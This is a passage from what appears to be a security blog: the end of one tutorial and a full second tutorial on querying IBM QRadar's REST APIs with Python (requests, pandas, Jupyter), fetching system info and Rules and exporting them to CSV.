   'Magnitude (Maximum)': 3.0,
   'Event Count (Sum)': 16.0,
   'Count': 16.0}]}
'''
type(resp)
# dict

The print statements defined in the check_status function help us understand if the search is still running or if it has completed.

Note: You can customize the verbosity of the messages in the check_status function. While simple print statements are helpful, there are other logging mechanisms available at your disposal.

We can see that resp contains the response - the result of our Top Log Sources QRadar Ariel Search in JSON format. However, the actual data we are interested in is stored under the key events.

type(resp['events'])
# list
len(resp['events'])
# 4

At this point, it is useful to store the raw JSON data into a different data structure - namely, a Pandas DataFrame.

A convenient way to convert our array of JSON objects, resp['events'] (of type list), into a DataFrame is the pandas.json_normalize function, as seen below.

df = pandas.json_normalize(resp['events'])
type(df)
# pandas.core.frame.DataFrame
df

As per the above snippet, the variable df now holds our result DataFrame.

The dimensions of the DataFrame can be retrieved using pandas.DataFrame.shape which returns a tuple of dimensions as seen below.

df.shape
# (4, 11)

Now that we have our result DataFrame, we can aggregate, visualize, and export the data as desired.
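For example, the minimal pandas sketch below computes each Log Source's share of the total event count, keeps the three largest, and exports them as CSV. To stay self-contained it rebuilds a small DataFrame from the Log Source and Event Count (Sum) values in the resp output above; with the real df you would skip that step. The Share (%) column name is hypothetical.

```python
import pandas

# Log Source and Event Count (Sum) values from the resp['events'] output above
events = [
    {"Log Source": "Health Metrics-2 :: localhost", "Event Count (Sum)": 113760.0},
    {"Log Source": "System Notification-2 :: qradar", "Event Count (Sum)": 23292.0},
    {"Log Source": "SIM Audit-2 :: qradar", "Event Count (Sum)": 168.0},
    {"Log Source": "Anomaly Detection Engine-2 :: qradar", "Event Count (Sum)": 16.0},
]
df = pandas.json_normalize(events)

# Each Log Source's share of all events in the search window, in percent
total = df["Event Count (Sum)"].sum()
df["Share (%)"] = (df["Event Count (Sum)"] / total * 100).round(2)

# The three noisiest Log Sources, largest first
top = df.nlargest(3, "Event Count (Sum)")

# Export as CSV text; pass a file path to to_csv() to write a file instead
csv_text = top.to_csv(index=False)
print(csv_text)
```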

The below screenshot shows the final Jupyter Notebook.

Conclusion

In this tutorial, we learnt how to leverage the QRadar Ariel Search REST API endpoints to run Ariel searches and fetch their results programmatically using Python. To summarize:

We started by understanding the relevance of searching in QRadar and how it is a basic but essential functionality.

Then, we dissected the high-level steps involved in running a new QRadar Ariel Search programmatically. Here, we discussed when to use a raw AQL Query and when to use a Saved Search ID. A diagram was provided to visualize the steps in the workflow.

Next, we delved into the various QRadar Ariel Search REST API endpoints available on QRadar to complete all the steps in the workflow. Here, we discussed each endpoint, including its parameters, response fields, and a sample JSON response.

Then, we wrote Python code using the concept of recursion to implement the steps in the workflow. We took an example Saved Search (Top Log Sources) and explained how we can capture its corresponding Saved Search ID, create a new QRadar Ariel Search, check its completion status, and retrieve the result in JSON format. We also converted the JSON response into a Pandas DataFrame to make querying and aggregation easier.

Using the concepts discussed in this tutorial, you can easily write Python code to automate QRadar searching tasks (such as Threat Hunting and SOC Reporting) which previously required manual effort.

You can view and download the Jupyter Notebook from this tutorial using the link below.

Jupyter Notebook: QRadar Ariel Search API

I hope you enjoyed reading this tutorial. Please reach out via email if you have any questions or comments.

Qradar Rest Apis Python

2021-10-06T00:00:00+00:00

Introduction

In this tutorial, we will learn how to get started with the QRadar REST APIs and write basic Python scripts to fetch sample data from QRadar.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

According to IBM QRadar documentation:

You access the RESTful API by sending HTTPS requests to specific URLs (endpoints) on the QRadar® SIEM Console. To send these requests, use the HTTP implementation that is built in to the programming language of your choice. Each request contains authentication information, and parameters that modify the request.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
Python 3.x.x

I am using Python 3.9.7 on my MacBook Pro with macOS Big Sur.

The code written in this tutorial might cause issues with Python 2. Please refer to Python.org to download the latest release of Python 3 for your OS.

Use the command: python --version to find the exact version of Python installed on your system. You might also want to try: python3 --version as python might refer to Python 2.
pip (Python Package Installer)

pip is a useful utility to install Python packages. I am using pip 21.2.4.

Usually, pip comes automatically installed with Python. You can verify by running the command: pip --version which should output the exact version of pip and which Python version it is associated with. You might also want to try: pip3 --version as pip might refer to Python 2.

If your Python environment does not have pip installed by default, please refer to the pip Installation documentation.

Setting up the Environment

In this section, we will set up the environment by installing the necessary tools and packages to start writing Python code to make REST API requests to QRadar.

Installing Python Packages

Let us install the following Python packages using pip:

requests - requests is an elegant and simple HTTP library for Python, built for human beings.

pip install requests
pandas - pandas is a fast, powerful, flexible and easy to use open source data analysis and manipulation tool, built on top of the Python programming language.

pip install pandas
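If you would like to confirm the environment from inside Python rather than from the shell, the minimal sketch below checks that the interpreter is Python 3 and reports whether pip, requests, and pandas can be found. The helper name check_environment is hypothetical and not part of any library.

```python
import importlib.util
import sys


def check_environment(packages=("pip", "requests", "pandas")):
    """Report whether we run on Python 3 and which packages are importable."""
    report = {"python3": sys.version_info.major == 3}
    for name in packages:
        # find_spec returns None when a top-level package cannot be located
        report[name] = importlib.util.find_spec(name) is not None
    return report


print(check_environment())
```

Any package reported as False can be installed with the pip commands above.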

Installing Jupyter Notebook

Writing Python scripts can be a daunting task for beginners. To make the coding experience easier and more intuitive, we will use a Jupyter Notebook.

According to Project Jupyter:

The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more.

Jupyter supports over 40 programming languages, including Python, R, Julia, and Scala. Notebooks can be shared with others using email, Dropbox, GitHub and the Jupyter Notebook Viewer.

We will create a new Jupyter Notebook with Python code. The first step is to install Jupyter. The recommended approach is to install Jupyter using Anaconda and conda. According to Jupyter documentation:

While Jupyter runs code in many programming languages, Python is a requirement (Python 3.3 or greater, or Python 2.7) for installing the Jupyter Notebook.

For new users, we highly recommend installing Anaconda. Anaconda conveniently installs Python, the Jupyter Notebook, and other commonly used packages for scientific computing and data science.

However, for the purpose of this tutorial, we will use the alternative approach which involves manually installing Jupyter with pip. According to Jupyter documentation:

First, ensure that you have the latest pip; older versions may have trouble with some dependencies:

pip3 install --upgrade pip

Then install the Jupyter Notebook using:

pip3 install jupyter

Note: If pip3 does not work, please try using pip or python3 -m pip instead.

Once completed, start the Jupyter Notebook server using the command jupyter notebook as seen in the screenshot below.

If successful, your browser should automatically open and navigate to the Notebook Dashboard at http://localhost:8888.

If the browser does not launch automatically, copy and paste the URL printed in the terminal into your browser, for example: http://localhost:8888/?token=10b589db740aa7a744a4aeaa3453feaab701dc03b89d59c5. The browser should then navigate to the Notebook Dashboard as seen above.

For more information about running the Jupyter Notebook Server, please refer to Running the Notebook.

Creating a Jupyter Notebook

To create a new Jupyter Notebook, click on the New drop-down button and select Python 3 (ipykernel) as seen in the screenshot below.

A new browser tab will be opened with the Notebook User Interface as seen in the screenshot below.

Python code can be written in the code cell. When the Run button is clicked, the code cell is executed and its output is displayed as seen in the screenshot below.

According to Jupyter documentation:

There are three types of cells: code cells, markdown cells, and raw cells.

A code cell allows you to edit and write new code, with full syntax highlighting and tab completion. The programming language you use depends on the kernel, and the default kernel (IPython) runs Python code.

You can document the computational process in a literate way, alternating descriptive text with code, using rich text. In IPython this is accomplished by marking up text with the Markdown language. The corresponding cells are called Markdown cells.

Raw cells provide a place in which you can write output directly. Raw cells are not evaluated by the notebook.

Generating a QRadar API Token

There are 2 ways to authenticate to QRadar while making an API request:

Username and Password
API Token

The recommended approach is to use an API Token for authentication via scripts. On QRadar, the API Token is also known as a SEC Token and must be generated by the admin on the QRadar Console.
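The two options differ only in what each request carries. The sketch below builds (but does not send) one request per option with requests.Request(...).prepare(), so the resulting headers can be inspected without a live console. It assumes the username and password option uses standard HTTP Basic authentication, while the API Token goes in a header named SEC, as used throughout this tutorial. The credentials are placeholders.

```python
import requests

URL = "https://192.168.56.144/api/system/about"  # lab console address used in this tutorial

# Option 1 (assumed HTTP Basic): username and password become an Authorization header
basic = requests.Request("GET", URL, auth=("admin", "placeholder-password")).prepare()

# Option 2: the API Token (SEC Token) travels in a custom header named SEC
token = requests.Request("GET", URL, headers={"SEC": "placeholder-token"}).prepare()

print(basic.headers["Authorization"])  # "Basic " followed by base64("admin:placeholder-password")
print(token.headers["SEC"])            # placeholder-token
```

With a token, no password ever leaves the notebook, and the token can be revoked from Authorized Services without changing the admin password.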

To generate a QRadar API Token, navigate to the Admin tab and click on Authorized Services as seen in the screenshot below.

A list of existing authorized services will be displayed as seen in the screenshot below. Click on Add Authorized Service to generate a new API Token.

A pop-up form will appear. In the form, provide a Service Name and select No Expiry for the Expiry Date as seen in the screenshot below. Click on Create Service.

QRadar will create a new authorized service. Copy the content under Authentication Token and store it somewhere safe. As seen in the screenshot below, QRadar requires you to Deploy Changes to persist the newly created authorized service. Close the pop-up.

On the Admin tab, QRadar will alert us about undeployed changes as seen in the screenshot below. Click on Deploy Changes.

Allow the process a couple of minutes to complete successfully.

Once completed, the alert will disappear.

For more information about authorized services, please refer to Managing authorized services.

QRadar Interactive API Documentation

Before we dive into the QRadar APIs, it is essential to keep a reference to the Interactive API Documentation for Developers page.

The Interactive API Documentation for Developers page is accessible from the QRadar Console and provides access to the documentation for various endpoints including their parameters and responses. Users can execute the APIs with custom parameters to view responses in real-time. It provides developers an opportunity to test the API before writing scripts.

To access the Interactive API Documentation for Developers page, log in to the QRadar Console, click on the hamburger menu on the top-left, and then click on Interactive API for Developers as seen in the screenshot below.

A new browser tab will be opened with the Interactive API Documentation for Developers page as seen in the screenshot below.

To view the documentation of a specific API, expand the folders on the left side and select the desired endpoint. Depending on the endpoint, all available methods (GET, POST, PUT, DELETE) will be displayed on the top. Click on the desired method to view the corresponding API documentation. In the screenshot below, we can see the API documentation for the endpoint /analytics/rules/{id} with the GET method.

API #1: About System

We begin the journey of discovering QRadar APIs with a simple goal to retrieve the current system information.

QRadar Interactive API

Since our goal is to retrieve data, it maps to a GET request. Based on this, the correct QRadar endpoint to target is /system/about, which only has GET in its list of available methods as seen in the screenshot below.

We can also identify the expected response of the API request. The response is in JSON format and contains 3 fields:

build_version - String
external_version - String
release_name - String

Scroll down to see information about any optional and required parameters for the API request. As per the screenshot below, there is one optional Query parameter called fields which allows us to specify which fields we would like to be returned in the response.
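In Python, optional Query parameters such as fields can be passed through the params argument of requests instead of being typed into the URL by hand. The sketch below prepares (without sending) a request that asks for two of the three fields and prints the resulting URL. Passing the field names as a comma-separated list is an assumption based on the parameter's description; confirm the exact syntax on the Interactive API Documentation page.

```python
import requests

URL = "https://192.168.56.144/api/system/about"

# Ask for only two of the three response fields via the optional fields query parameter
prepared = requests.Request(
    "GET", URL, params={"fields": "release_name,external_version"}
).prepare()

print(prepared.url)
# https://192.168.56.144/api/system/about?fields=release_name%2Cexternal_version
```

requests percent-encodes the comma, so the same params dictionary can later be passed to requests.get unchanged.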

It is also useful to note the cURL one-liner command which can be used verbatim to make the API request and retrieve its response using the popular cURL utility.

Click on Try It Out! to execute the API request in real-time and view its response as seen in the screenshot below.

From the above screenshot, we have the JSON response, which is:

{
  "release_name": "7.3.3",
  "build_version": "2019.14.0.20191031163225",
  "external_version": "7.3.3"
}

Now that we have tested the /system/about API on the Interactive API Documentation page, it is time to write Python code to make the API request and retrieve its response.

Python Code

We start by importing the requests Python package as seen below.

import requests

The next step is to define a variable called SEC_TOKEN to hold the QRadar API Token that we generated above as seen below.

SEC_TOKEN = '4150d602-11ba-4d55-b3de-b6ebfe8b93ac'
type(SEC_TOKEN)
# str
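Hard-coding the token is convenient in a lab notebook, but it is easy to leak when the notebook is shared. A minimal alternative, assuming you export the token in an environment variable named QRADAR_SEC_TOKEN (a name chosen for this example) before starting Jupyter; the helper load_sec_token is hypothetical:

```python
import os


def load_sec_token(var_name="QRADAR_SEC_TOKEN"):
    """Read the QRadar API Token from an environment variable instead of the notebook."""
    token = os.environ.get(var_name)
    if not token:
        raise RuntimeError(f"Set the {var_name} environment variable to your QRadar API Token")
    return token
```

In the notebook, SEC_TOKEN = load_sec_token() then replaces the hard-coded assignment.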

We will also define a variable called URL to hold the complete QRadar API URL to target the /system/about endpoint as seen below.

URL = 'https://192.168.56.144/api/system/about'
type(URL)
# str

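Note: The complete QRadar API URL is provided on the Interactive API Documentation page corresponding to the endpoint.

Next, we will define a variable called header to hold the Header content for the API request as seen below. We will utilize the SEC_TOKEN variable that was defined above as a value to the key SEC.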

header = {
    'SEC':SEC_TOKEN,
    'Content-Type':'application/json',
    'accept':'application/json'
}
type(header)
# dict

After the variables have been defined, we can make the GET request using the requests.get function as seen below. The result is stored in a variable called r.

According to Python requests documentation:

Requests verifies SSL certificates for HTTPS requests, just like a web browser. By default, SSL verification is enabled, and Requests will throw a SSLError if it’s unable to verify the certificate.

Requests can also ignore verifying the SSL certificate if you set verify to False.

r = requests.get(URL, headers=header, verify=False)
type(r)
# requests.models.Response

Note: As we have set verify to False, you will likely see an InsecureRequestWarning, which can be safely ignored in this tutorial.
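Two small refinements are worth considering once you move beyond the lab. The sketch below silences only the InsecureRequestWarning (via urllib3.disable_warnings; urllib3 is installed as a dependency of requests), adds a timeout so an unresponsive console does not hang the notebook, and calls raise_for_status() so HTTP errors such as an authentication failure surface as exceptions instead of an error body being parsed as data. The helper name qradar_get is hypothetical; for production use, prefer pointing verify at your console's CA certificate rather than disabling verification.

```python
import requests
import urllib3

# Silence only the warning caused by verify=False (acceptable in a lab, not in production)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def qradar_get(url, sec_token, params=None, verify=False, timeout=30):
    """GET a QRadar API endpoint and return the decoded JSON body (hypothetical helper)."""
    headers = {
        'SEC': sec_token,
        'Content-Type': 'application/json',
        'accept': 'application/json',
    }
    r = requests.get(url, headers=headers, params=params, verify=verify, timeout=timeout)
    r.raise_for_status()  # raises requests.HTTPError for 4xx/5xx responses
    return r.json()
```

Usage: about = qradar_get('https://192.168.56.144/api/system/about', SEC_TOKEN)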

We can access the content of the response using response.text as seen below.

r.text
# '{"release_name":"7.3.3","build_version":"2019.14.0.20191031163225","external_version":"7.3.3"}'
type(r.text)
# str

However, response.text is a string. Although we could manually decode it using the json.loads function, the easier approach is to use the response.json function to decode the content as JSON, as seen below.

r.json()
'''
{'release_name': '7.3.3',
 'build_version': '2019.14.0.20191031163225',
 'external_version': '7.3.3'}
'''
type(r.json())
# dict
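For completeness, here is the manual route mentioned above: json.loads applied to the exact string returned by r.text produces the same dictionary that r.json() returns. The sketch hard-codes that string so it runs without a QRadar connection.

```python
import json

# The raw string returned by r.text in the example above
text = '{"release_name":"7.3.3","build_version":"2019.14.0.20191031163225","external_version":"7.3.3"}'

about = json.loads(text)  # same dict that r.json() returns for this body
print(type(about).__name__, about["release_name"])  # dict 7.3.3
```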

It is now easy to access each field using its key. Below, we see how to access the content of release_name.

r.json()['release_name']
# '7.3.3'

The below screenshot shows the final Jupyter Notebook.

API #2: QRadar Rules

In the previous section, we targeted a simple QRadar API and retrieved the current system information. Let us take things to the next level!

In this section, we will target a more complex QRadar API with an aim to retrieve all the Rules on the system. Once the Rules are retrieved, we will export them to a neat CSV file.

Note: This is a practical example. As a QRadar admin, you are likely to receive requests to generate an export of the Rules. Don’t worry, I’ve got you covered!

QRadar Interactive API

As in the previous section, our goal is to retrieve data, which maps to a GET request. Based on this, the correct QRadar endpoint to target is /analytics/rules, which only has GET in its list of available methods as seen in the screenshot below.

There are 14 fields returned in the JSON response. They are:

id - Long
name - String
type - String
enabled - Boolean
owner - String
origin - String
base_capacity - Long
base_host_id - Long
average_capacity - Long
capacity_timestamp - Long
identifier - String
linked_rule_identifier - String
creation_date - Long
modification_date - Long

Scroll down to see information about the parameters. As per the screenshot below, there are 3 optional parameters:

fields - Query parameter which allows us to specify which fields we would like to be returned in the response.
filter - Query parameter which allows us to specify filters to limit the contents returned in the response.
Range - Header parameter which allows us to restrict the number of elements that are returned in the response.
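The fields and filter parameters can be combined in Python the same way as on the Interactive API page. The sketch below prepares (without sending) a request for only the id, name, and enabled fields of enabled Rules. The filter expression enabled=true is an assumption about QRadar's filter syntax; test it on the Interactive API Documentation page before relying on it.

```python
import requests

URL = "https://192.168.56.144/api/analytics/rules"

params = {
    "fields": "id,name,enabled",  # return only these three fields per Rule
    "filter": "enabled=true",     # assumed filter expression: enabled Rules only
}
prepared = requests.Request("GET", URL, params=params).prepare()
print(prepared.url)
```

The printed URL shows the encoded query string; passing the same params dictionary to requests.get sends it.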

Note: The Range parameter is usually pre-populated with the value items=0-49 on the Interactive API Documentation page. This keeps particularly large API requests from overwhelming the system and consuming excessive resources. However, the value can be modified or removed, as the parameter is an editable text box.

While testing, it is always recommended to limit the number of elements returned in the response by using the Range Header parameter.
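When a system has many Rules, you may prefer to fetch them in pages rather than in one large response. The sketch below sends the Range header in the same items=start-end form shown on the Interactive API page and stops when a page comes back shorter than requested. The function names are hypothetical, and the stopping rule assumes that a range starting past the last item returns an empty list; if your QRadar version answers with an error status instead, stop on that status or read the total from a Content-Range response header if one is returned.

```python
import requests


def range_header(start, page_size):
    """Build a Range header such as items=0-49 (both ends inclusive)."""
    return {"Range": f"items={start}-{start + page_size - 1}"}


def fetch_all_rules(url, headers, page_size=50, verify=False, timeout=30):
    """Page through an endpoint with the Range header until a short page arrives."""
    results, start = [], 0
    while True:
        page_headers = {**headers, **range_header(start, page_size)}
        r = requests.get(url, headers=page_headers, verify=verify, timeout=timeout)
        r.raise_for_status()
        page = r.json()
        results.extend(page)
        if len(page) < page_size:  # last (possibly empty) page reached
            return results
        start += page_size
```

Usage: rules = fetch_all_rules(URL, header), reusing the URL and header variables defined below.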

Click on Try It Out! to execute the API request in real-time and view its response as seen in the screenshot below.

From the above screenshot, we have the JSON response, which is:

[
  {
    "owner": "admin",
    "identifier": "SYSTEM-500",
    "base_host_id": 0,
    "capacity_timestamp": 0,
    "origin": "SYSTEM",
    "creation_date": 1217009466305,
    "type": "EVENT",
    "enabled": true,
    "modification_date": 1622547818835,
    "linked_rule_identifier": null,
    "name": "System: Notification",
    "average_capacity": 0,
    "id": 500,
    "base_capacity": 0
  },
  {
    "owner": "admin",
    "identifier": "SYSTEM-1443",
    "base_host_id": 0,
    "capacity_timestamp": 0,
    "origin": "SYSTEM",
    "creation_date": 1273171233573,
    "type": "EVENT",
    "enabled": false,
    "modification_date": 1622547818194,
    "linked_rule_identifier": null,
    "name": "Devices with High Event Rates",
    "average_capacity": 0,
    "id": 100001,
    "base_capacity": 0
  },
  .
  .
  .
]

In short, the response contains raw JSON data for 50 QRadar Rules, matching the pre-populated Range value of items=0-49. The snippet above has been truncated because of the number of lines required to represent the entire JSON response.

It is crucial to note that the response is NOT just a single JSON object. In fact, it is an Array of JSON objects. This representation makes sense because each QRadar Rule is a JSON object with its own key-value pairs. Since there are multiple Rules in the response, an Array is the perfect data structure to contain all the Rules.

Now that we have tested the /analytics/rules API on the Interactive API Documentation page, it is time to write Python code to make the API request and retrieve its response.

Python Code

Create a new Jupyter Notebook and start by importing the requests and pandas Python packages as seen below.

import requests
import pandas

Similar to the Python code in the previous section, we will define a variable called SEC_TOKEN to hold the QRadar API Token that we generated above as seen below.

SEC_TOKEN = '4150d602-11ba-4d55-b3de-b6ebfe8b93ac'
type(SEC_TOKEN)
# str

Similar to the Python code in the previous section, we will also define a variable called URL to hold the complete QRadar API URL to target the /analytics/rules endpoint as seen below.

URL = 'https://192.168.56.144/api/analytics/rules'
type(URL)
# str

Note: The complete QRadar API URL is provided on the Interactive API Documentation page corresponding to the endpoint.

Similar to the Python code in the previous section, we will also define a variable called header to hold the Header content for the API request as seen below. We will utilize the SEC_TOKEN variable that was defined above as a value to the key SEC.

header = {
    'SEC':SEC_TOKEN,
    'Content-Type':'application/json',
    'accept':'application/json'
}
type(header)
# dict

After the variables have been defined, we can make the GET request using the requests.get function as seen below. The result is stored in a variable called r.

r = requests.get(URL, headers=header, verify=False)
type(r)
# requests.models.Response

Note: As we have set verify to False, you will likely see an InsecureRequestWarning, which can be safely ignored in this tutorial.

We can access the content of the response using response.text as seen below.

r.text
# '[{"owner":"admin","identifier":"SYSTEM-500","base_host_id":0,"capacity_timestamp":0,"origin":"SYSTEM","creation_date":1217009466305,"type":"EVENT","enabled":true,"modification_date":1622547818835,"linked_rule_identifier":null,"name":"System: Notification","average_capacity":0,"id":500,"base_capacity":0},{"owner":"admin","identifier":"SYSTEM-1443","base_host_id":0,"capacity_timestamp":0,"origin":"SYSTEM","creation_date":1273171233573,"type":"EVENT","enabled":false,"modification_date":1622547818194,"linked_rule_identifier":null,"name":"Devices with High Event Rates","average_capacity":0,"id":100001,"base_capacity":0},...]'
type(r.text)
# str

The output of r.text has been truncated because of the number of lines required to represent the entire response.

Similar to the Python code in the previous section, we will utilize the response.json function to decode the content in JSON format as seen below.

r.json()
'''
[{'owner': 'admin',
  'identifier': 'SYSTEM-500',
  'base_host_id': 0,
  'capacity_timestamp': 0,
  'origin': 'SYSTEM',
  'creation_date': 1217009466305,
  'type': 'EVENT',
  'enabled': True,
  'modification_date': 1622547818835,
  'linked_rule_identifier': None,
  'name': 'System: Notification',
  'average_capacity': 0,
  'id': 500,
  'base_capacity': 0},
 {'owner': 'admin',
  'identifier': 'SYSTEM-1443',
  'base_host_id': 0,
  'capacity_timestamp': 0,
  'origin': 'SYSTEM',
  'creation_date': 1273171233573,
  'type': 'EVENT',
  'enabled': False,
  'modification_date': 1622547818194,
  'linked_rule_identifier': None,
  'name': 'Devices with High Event Rates',
  'average_capacity': 0,
  'id': 100001,
  'base_capacity': 0},
  .
  .
  .
]
'''
type(r.json())
# list
len(r.json())
# 168
type(len(r.json()))
# int

It is crucial to note the type of r.json(). It is a list and NOT dict like in the previous section.

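Based on this, we can derive our first insight from the data: the total number of QRadar Rules on the system, which is the length of the JSON response. In the above snippet, len(r.json()) does exactly this and gives us 168 (an integer). This is more than the 50 Rules we saw on the Interactive API Documentation page because our Python request does not send the Range header and therefore receives every Rule.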

Now, consider querying the data. For starters, we would need to loop over the list and process it item by item. Below, we print the name of each Rule line by line.

for rule in r.json():
    print(rule['name'])
'''
System: Notification
Devices with High Event Rates
Excessive Database Connections
Excessive Firewall Accepts Across Multiple Hosts
Excessive Firewall Denies from Single Source
AssetExclusion: Exclude DNS Name By IP
AssetExclusion: Exclude DNS Name By MAC Address
AssetExclusion: Exclude DNS Name By NetBIOS Name
.
.
.
'''

Okay, that was straightforward. How about performing a group-by operation? For example: Count of Rules by enabled; i.e., how many Rules are enabled and how many Rules are disabled?

Note: enabled is a field in each Rule’s JSON object and holds a Boolean value of either True or False to indicate whether the Rule is enabled on the system.

enabled_count = 0
disabled_count = 0
for rule in r.json():
    # enabled holds a Boolean, so it can be tested directly
    if rule['enabled']:
        enabled_count += 1
    else:
        disabled_count += 1
print(enabled_count)
# 131
print(disabled_count)
# 37

Probably not the most efficient approach, but it does give us the answer to our question.
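For comparison, Python’s standard library already provides a counting tool: collections.Counter tallies every distinct value in a single pass. The sketch below runs it on two Rules copied from the sample response; in the notebook you would pass r.json() instead of the hard-coded list.

```python
from collections import Counter

# Two Rules from the sample response above (only the fields we need)
rules = [
    {"name": "System: Notification", "enabled": True},
    {"name": "Devices with High Event Rates", "enabled": False},
]

counts = Counter(rule["enabled"] for rule in rules)
print(counts[True], counts[False])  # 1 1
```

Unlike indexing a dictionary, counts[False] returns 0 rather than raising an error when no Rule is disabled.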

At this point, it is useful to store the raw JSON data into a different data structure - namely, a Pandas DataFrame.

According to GeeksforGeeks:

Pandas DataFrame is two-dimensional size-mutable, potentially heterogeneous tabular data structure with labeled axes (rows and columns). A Data frame is a two-dimensional data structure, i.e., data is aligned in a tabular fashion in rows and columns. Pandas DataFrame consists of three principal components, the data, rows, and columns.

A convenient way to convert our Array of JSON objects (r.json(), which is of type list) into a DataFrame is the pandas.json_normalize function, as seen below.

According to Pandas documentation:

pandas provides a utility function to take a dict or list of dicts and normalize this semi-structured data into a flat table.

df = pandas.json_normalize(r.json())
type(df)
# pandas.core.frame.DataFrame
df

As per the above snippet, the variable df now holds our Rules DataFrame.

In the output of df, we can see the dimensions of the DataFrame: 168 rows x 14 columns. The same can be retrieved using pandas.DataFrame.shape, which returns a tuple of dimensions as seen below.

df.shape
# (168, 14)
type(df.shape)
# tuple
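If you want to experiment with json_normalize without a live console, the sketch below rebuilds the two Rules from the sample JSON response as Python dictionaries and normalizes them. Because these Rule objects are flat (no nested objects), pandas.DataFrame(sample_rules) would produce the same table; json_normalize earns its keep when records contain nested objects, which it flattens into dotted column names.

```python
import pandas

# The two Rules shown in the sample JSON response above (None stands in for null)
sample_rules = [
    {"owner": "admin", "identifier": "SYSTEM-500", "base_host_id": 0,
     "capacity_timestamp": 0, "origin": "SYSTEM", "creation_date": 1217009466305,
     "type": "EVENT", "enabled": True, "modification_date": 1622547818835,
     "linked_rule_identifier": None, "name": "System: Notification",
     "average_capacity": 0, "id": 500, "base_capacity": 0},
    {"owner": "admin", "identifier": "SYSTEM-1443", "base_host_id": 0,
     "capacity_timestamp": 0, "origin": "SYSTEM", "creation_date": 1273171233573,
     "type": "EVENT", "enabled": False, "modification_date": 1622547818194,
     "linked_rule_identifier": None, "name": "Devices with High Event Rates",
     "average_capacity": 0, "id": 100001, "base_capacity": 0},
]

sample_df = pandas.json_normalize(sample_rules)
print(sample_df.shape)  # (2, 14): one row per Rule, one column per field
print(sample_df[["id", "name", "enabled"]])
```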

Okay, we now have our DataFrame. What’s next?

Well, let’s go back to that group-by operation from earlier; i.e., Count of Rules by enabled. Below, we will attempt to calculate the result using the DataFrame and its associated functions.

df.groupby('enabled').size()
'''
enabled
False     37
True     131
dtype: int64
'''

Look at that, a one-liner!

If we dissect the above snippet, we can see the use of the pandas.DataFrame.groupby function to perform the actual grouping based on the enabled column. Once the grouping is completed, we can aggregate and calculate the counts in each group using the pandas.core.groupby.GroupBy.size function which returns a pandas.core.series.Series.

According to GeeksforGeeks:

Pandas Series is a one-dimensional labeled array capable of holding data of any type (integer, string, float, python objects, etc.).

To retrieve the actual values from the Series, we simply need to use the index as seen below.

enabled_count = df.groupby('enabled').size()[True]
enabled_count
# 131
type(enabled_count)
# numpy.int64
disabled_count = df.groupby('enabled').size()[False]
disabled_count
# 37
type(disabled_count)
# numpy.int64

Note: The index values (True and False) are of type Boolean (bool) and NOT String.
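One caveat with indexing the Series directly: if every Rule happens to be enabled (or disabled), the missing group is simply absent from the result, so size()[False] raises a KeyError. A minimal sketch using Series.get with a default, on a hypothetical DataFrame where every Rule is enabled:

```python
import pandas

df = pandas.DataFrame({"enabled": [True, True, True]})  # hypothetical: no disabled Rules

counts = df.groupby("enabled").size()
# counts[False] would fail here because no False group exists;
# Series.get returns the supplied default instead
enabled_count = counts.get(True, 0)
disabled_count = counts.get(False, 0)
print(enabled_count, disabled_count)  # 3 0
```

df['enabled'].value_counts() returns the same counts as groupby('enabled').size(), sorted by frequency.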

Awesome! If you remember, we have one more thing to do. Yes, we wanted to export the QRadar Rules to CSV.

We can easily export a DataFrame to CSV using the pandas.DataFrame.to_csv function as seen below.

df.to_csv('rules_export.csv')

The file should be exported to the directory from where you are running your Jupyter Notebook.
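Two optional tweaks can make the export friendlier for whoever receives it. By default, to_csv also writes the DataFrame index as an unnamed first column; index=False omits it. The 13-digit creation_date and modification_date values look like epoch timestamps in milliseconds (an assumption based on their magnitude), so pandas.to_datetime with unit='ms' can turn them into readable dates. The sketch uses a reduced two-Rule DataFrame and a temporary directory so it runs on its own; in the notebook you would apply the same two steps to df and write to 'rules_export.csv'.

```python
import os
import tempfile

import pandas

# Two Rules from the sample response, reduced to a few columns for brevity
df = pandas.DataFrame([
    {"id": 500, "name": "System: Notification", "enabled": True,
     "creation_date": 1217009466305, "modification_date": 1622547818835},
    {"id": 100001, "name": "Devices with High Event Rates", "enabled": False,
     "creation_date": 1273171233573, "modification_date": 1622547818194},
])

# Assumed: both date fields are epoch timestamps in milliseconds
for col in ("creation_date", "modification_date"):
    df[col] = pandas.to_datetime(df[col], unit="ms")

path = os.path.join(tempfile.mkdtemp(), "rules_export.csv")
df.to_csv(path, index=False)  # index=False drops the unnamed 0..n-1 index column

print(pandas.read_csv(path).columns.tolist())
```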

We can open the file rules_export.csv in a text editor to view the raw data as seen in the screenshot below.

We can also open the file rules_export.csv with Microsoft Excel which provides a more tabular view of the data as seen in the screenshot below.

The below screenshot shows the final Jupyter Notebook.

Conclusion

In this tutorial, we installed and leveraged Jupyter Notebook to write Python code to programmatically retrieve and parse data from QRadar. To summarize:

We started by setting up the environment, which involved installing the relevant Python packages, installing Jupyter Notebook, and generating a QRadar API Token to authenticate to QRadar while making API requests.

Then, we touched on the QRadar Interactive API Documentation, which is a powerful knowledge-base for developers.

We began our QRadar API journey with an aim to retrieve the current system information. We went step-by-step in the process of identifying the corresponding API’s response fields, parameters, and sample JSON response in the Interactive API Documentation page. Then, we wrote Python code using the requests Python package to make a GET request and parse the response to capture individual field values.

Next, we continued our journey with an aim to retrieve all the QRadar Rules and export them to a CSV file. Again, we went step-by-step in the process of identifying the corresponding API’s response fields, parameters, and sample JSON response in the Interactive API Documentation page. In the sample JSON response, we identified that the response was NOT a single JSON object. Instead, the response was an Array of JSON objects. Keeping that in mind, we wrote Python code using the requests Python package to make a GET request and parse the response. The response was a Python list, which made querying and aggregation cumbersome. To better store and analyze the data, we leveraged the pandas Python package and created a new DataFrame, which made querying and aggregation much easier. Finally, we exported the Rules to a CSV file using the handy pandas.DataFrame.to_csv function.

You can view and download the Jupyter Notebooks from this tutorial using the links below.

Jupyter Notebook 1: QRadar About System API

Jupyter Notebook 2: QRadar Rules API

I hope you enjoyed reading this tutorial. Please reach out via email if you have any questions or comments.

Ransomware Notes Bhis

